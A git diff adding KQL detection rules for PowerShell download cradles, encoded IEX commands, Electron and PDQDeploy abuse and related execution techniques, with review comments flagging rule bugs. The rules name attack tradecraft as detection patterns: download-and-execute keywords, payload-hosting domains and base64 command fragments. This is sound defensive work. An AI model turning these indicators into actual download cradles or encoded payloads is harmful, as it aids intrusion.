a/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql b/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql new file mode 100644 index 00000000..3ff906ba --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql 
@@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Electron Application CommandLine +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-05 +// Level: medium +// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage for debugging purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains "--browser-subprocess-path" or ProcessCommandLine contains "--gpu-launcher" or ProcessCommandLine contains "--renderer-cmd-prefix" or ProcessCommandLine contains "--utility-cmd-prefix") and ((FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\code.exe" or FolderPath endswith "\\discord.exe" or FolderPath endswith "\\GitHubDesktop.exe" or FolderPath endswith "\\keybase.exe" or FolderPath endswith "\\msedge_proxy.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\slack.exe" or FolderPath endswith "\\Teams.exe") or (ProcessVersionInfoOriginalFileName in~ ("chrome.exe", "code.exe", "discord.exe", "GitHubDesktop.exe", "keybase.exe", "msedge_proxy.exe", "msedge.exe", "msedgewebview2.exe", "msteams.exe", "slack.exe", "Teams.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql b/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql new file mode 100644 index 00000000..43299eac --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql 
@@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Execution Of PDQDeployRunner +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-22 +// Level: medium +// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate use of the PDQDeploy tool to execute these commands + +DeviceProcessEvents +| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\TEMP\\" or FolderPath contains "\\AppData\\Local\\Temp") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -encodedcommand " or ProcessCommandLine contains " -w hidden" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "http" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-")) and InitiatingProcessFolderPath contains "\\PDQDeployRunner-" \ No newline at end of file 
diff --git a/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql b/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql new file mode 100644 index 00000000..b018e74b --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or 
ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql b/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql new file mode 100644 index 00000000..099c6c56 --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary +// Author: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-21 +// Level: medium +// Description: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.007 +// False Positives: +// - Legitimate scripts using Node.js with these modules + +DeviceProcessEvents +| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "execSync" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains "fs" and ProcessCommandLine contains "path" and ProcessCommandLine contains "zlib") and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js") \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql b/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql new file mode 100644 index 00000000..5241b710 --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql 
@@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Named Pipe Created Via Mkfifo +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: medium +// Description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains " /tmp/" and FolderPath endswith "/mkfifo" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql b/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql new file mode 100644 index 00000000..de91eb39 --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious WebDAV LNK Execution +// Author: Micah Babinski +// Date: 2023-08-21 +// Level: medium +// Description: Detects possible execution via LNK file accessed on a WebDAV server. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.t1204 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\DavWWWRoot\\" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_as_a_service_in_registry.kql b/KQL/rules/Execution/powershell_as_a_service_in_registry.kql new file mode 100644 index 00000000..c1021955 --- /dev/null +++ b/KQL/rules/Execution/powershell_as_a_service_in_registry.kql 
@@ -0,0 +1,10 @@
+// Title: PowerShell as a Service in Registry
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-06
+// Level: high
+// Description: Detects that a powershell code is written to the registry as a service.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey endswith "\\Services*" and RegistryKey endswith "\\ImagePath"
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql b/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql
new file mode 100644
index 00000000..a8a14e98
--- /dev/null
+++ b/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql
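Review bot: The predicate `RegistryKey endswith "\\Services*" and RegistryKey endswith "\\ImagePath"` on the last hunk line can never be true, because one RegistryKey cannot end in both strings; the `*` looks like a Sigma wildcard emitted as a literal character, so this high-level rule is dead on arrival. In DeviceRegistryEvents the value name is reported in RegistryValueName rather than appended to RegistryKey, so the line should read `| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey contains "\\Services\\" and RegistryValueName =~ "ImagePath"`. The execution-policy rule ending on L2596 has the same value-name-in-key mapping (its `\\EnableScripts` suffix belongs in RegistryValueName), and since these files appear to be converter output the fix presumably belongs in the registry field mapping of the converter.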
@@ -0,0 +1,10 @@ +// Title: PowerShell Base64 Encoded IEX Cmdlet +// Author: Florian Roth (Nextron Systems) +// Date: 2019-08-23 +// Level: high +// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "SUVYIChb" or ProcessCommandLine contains "lFWCAoW" or ProcessCommandLine contains "JRVggKF" or ProcessCommandLine contains "aWV4IChb" or ProcessCommandLine contains "lleCAoW" or ProcessCommandLine contains "pZXggKF" or ProcessCommandLine contains "aWV4IChOZX" or ProcessCommandLine contains "lleCAoTmV3" or ProcessCommandLine contains "pZXggKE5ld" or ProcessCommandLine contains "SUVYIChOZX" or ProcessCommandLine contains "lFWCAoTmV3" or ProcessCommandLine contains "JRVggKE5ld" or ProcessCommandLine contains "SUVYKF" or ProcessCommandLine contains "lFWChb" or ProcessCommandLine contains "JRVgoW" or ProcessCommandLine contains "aWV4KF" or ProcessCommandLine contains "lleChb" or ProcessCommandLine contains "pZXgoW" or ProcessCommandLine contains "aWV4KE5ld" or ProcessCommandLine contains "lleChOZX" or ProcessCommandLine contains "pZXgoTmV3" or ProcessCommandLine contains "SUVYKE5ld" or ProcessCommandLine contains "lFWChOZX" or ProcessCommandLine contains "JRVgoTmV3" or ProcessCommandLine contains "SUVYKCgn" or ProcessCommandLine contains "lFWCgoJ" or ProcessCommandLine contains "JRVgoKC" or ProcessCommandLine contains "aWV4KCgn" or ProcessCommandLine contains "lleCgoJ" or ProcessCommandLine contains "pZXgoKC") or (ProcessCommandLine contains "SQBFAFgAIAAoAFsA" or ProcessCommandLine contains "kARQBYACAAKABbA" or ProcessCommandLine contains "JAEUAWAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAFsA" or ProcessCommandLine contains "kAZQB4ACAAKABbA" or ProcessCommandLine contains "pAGUAeAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAE4AZQB3A" or ProcessCommandLine contains 
"kAZQB4ACAAKABOAGUAdw" or ProcessCommandLine contains "pAGUAeAAgACgATgBlAHcA" or ProcessCommandLine contains "SQBFAFgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kARQBYACAAKABOAGUAdw" or ProcessCommandLine contains "JAEUAWAAgACgATgBlAHcA") \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql b/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql new file mode 100644 index 00000000..41da956b --- /dev/null +++ b/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Base64 Encoded Invoke Keyword +// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t +// Date: 2022-05-20 +// Level: high +// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql b/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql new file mode 100644 index 00000000..fdd6da7a --- /dev/null +++ b/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql 
@@ -0,0 +1,12 @@ +// Title: PowerShell Base64 Encoded Reflective Assembly Load +// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) +// Date: 2022-03-01 +// Level: high +// Description: Detects base64 encoded .NET reflective loading of Assembly +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, attack.t1620 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" \ No newline at end of file 
diff --git a/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql b/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql
new file mode 100644
index 00000000..3c650e17
--- /dev/null
+++ b/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql
@@ -0,0 +1,10 @@ +// Title: PowerShell Base64 Encoded WMI Classes +// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-30 +// Level: high +// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains 
"XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains "V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud")) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql new file mode 100644 index 00000000..838b3eab --- /dev/null +++ b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql 
@@ -0,0 +1,15 @@ +// Title: PowerShell Core DLL Loaded By Non PowerShell Process +// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2019-11-14 +// Level: medium +// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process. +Detects behavior similar to meterpreter's "load powershell" extension. + +// MITRE Tactic: Execution +// Tags: attack.t1059.001, attack.execution +// False Positives: +// - Used by some .NET binaries, minimal on user workstation. +// - Used by Microsoft SQL Server Management Studio + +DeviceImageLoadEvents +| where (InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll" or (FolderPath endswith "\\System.Management.Automation.dll" or FolderPath endswith "\\System.Management.Automation.ni.dll")) and (not(((InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe", "C:\\Windows\\System32\\runscripthelper.exe", "C:\\WINDOWS\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "C:\\Windows\\System32\\winrshost.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\winrshost.exe", "C:\\Windows\\SysWOW64\\wsmprovhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe")))) and (not((isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath startswith "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessFolderPath endswith "\\Citrix\\ConfigSync\\ConfigSyncRun.exe" or ((InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\") or (InitiatingProcessFolderPath endswith "\\IDE\\Ssms.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server Management Studio" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server Management Studio")) or (InitiatingProcessFolderPath endswith "\\Tools\\Binn\\SQLPS.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_download_and_execution_cradles.kql b/KQL/rules/Execution/powershell_download_and_execution_cradles.kql new file mode 100644 index 00000000..9717cb71 --- /dev/null +++ b/KQL/rules/Execution/powershell_download_and_execution_cradles.kql 
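Review bot: The Description continuation `+Detects behavior similar to meterpreter's "load powershell" extension.` on L2589 is written without the `//` prefix, so the generated .kql contains a bare prose line ahead of the query and will not parse as a query file. Each wrapped line of a multi-line Sigma description needs its own prefix, i.e. `// Detects behavior similar to meterpreter's "load powershell" extension.`; the MSI-install rule ending on L2595 has three such unprefixed lines. These files appear to be produced by the converter named in the commit message, so the header writer there is presumably the place to fix it rather than the individual files.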
@@ -0,0 +1,12 @@
+// Title: PowerShell Download and Execution Cradles
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-24
+// Level: high
+// Description: Detects PowerShell download and execution cradles.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Some PowerShell installers were seen using similar combinations. Apply filters accordingly
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "irm ") and (ProcessCommandLine contains ";iex $" or ProcessCommandLine contains "| IEX" or ProcessCommandLine contains "|IEX " or ProcessCommandLine contains "I`E`X" or ProcessCommandLine contains "I`EX" or ProcessCommandLine contains "IE`X" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "IEX (" or ProcessCommandLine contains "IEX(" or ProcessCommandLine contains "Invoke-Expression")
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_download_pattern.kql b/KQL/rules/Execution/powershell_download_pattern.kql
new file mode 100644
index 00000000..b36d6c9d
--- /dev/null
+++ b/KQL/rules/Execution/powershell_download_pattern.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Download Pattern
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a Powershell process that contains download commands in its command line string
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "string(" or ProcessCommandLine contains "file(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "net.webclient)." and ProcessCommandLine contains "download")) and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql b/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql
new file mode 100644
index 00000000..2cf959b8
--- /dev/null
+++ b/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Execution With Potential Decryption Capabilities
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-30
+// Level: high
+// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Get-ChildItem " or ProcessCommandLine contains "dir " or ProcessCommandLine contains "gci " or ProcessCommandLine contains "ls ") and (ProcessCommandLine contains "Get-Content " or ProcessCommandLine contains "gc " or ProcessCommandLine contains "cat " or ProcessCommandLine contains "type " or ProcessCommandLine contains "ReadAllBytes") and ((ProcessCommandLine contains " ^| " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "-Recurse" and ProcessCommandLine contains "-Skip ") or (ProcessCommandLine contains " -ExpandProperty " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "WriteAllBytes" and ProcessCommandLine contains " .length ")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql b/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql
new file mode 100644
index 00000000..dc383340
--- /dev/null
+++ b/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql
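Review bot: The process-identity clause at the end of the `| where` line joins the FolderPath and ProcessVersionInfoOriginalFileName checks with `and`, whereas the sibling rules ending on L2584, L2587 and L2592 join the same pair with `or`; requiring both drops any event where only one identifier matches, such as a renamed or copied PowerShell binary, which is exactly the case a high-level rule should keep. Change `FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))` to `FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))` so the rules agree; if the `and` is a faithful rendering of the source rule, the converter's handling of list-valued selections is worth a second look. The Description also carries a stray quote (`".LNK" "file`) that could be fixed while touching the header.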
@@ -0,0 +1,10 @@
+// Title: Powershell Inline Execution From A File
+// Author: frack113
+// Date: 2022-12-25
+// Level: medium
+// Description: Detects inline execution of PowerShell code from a file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
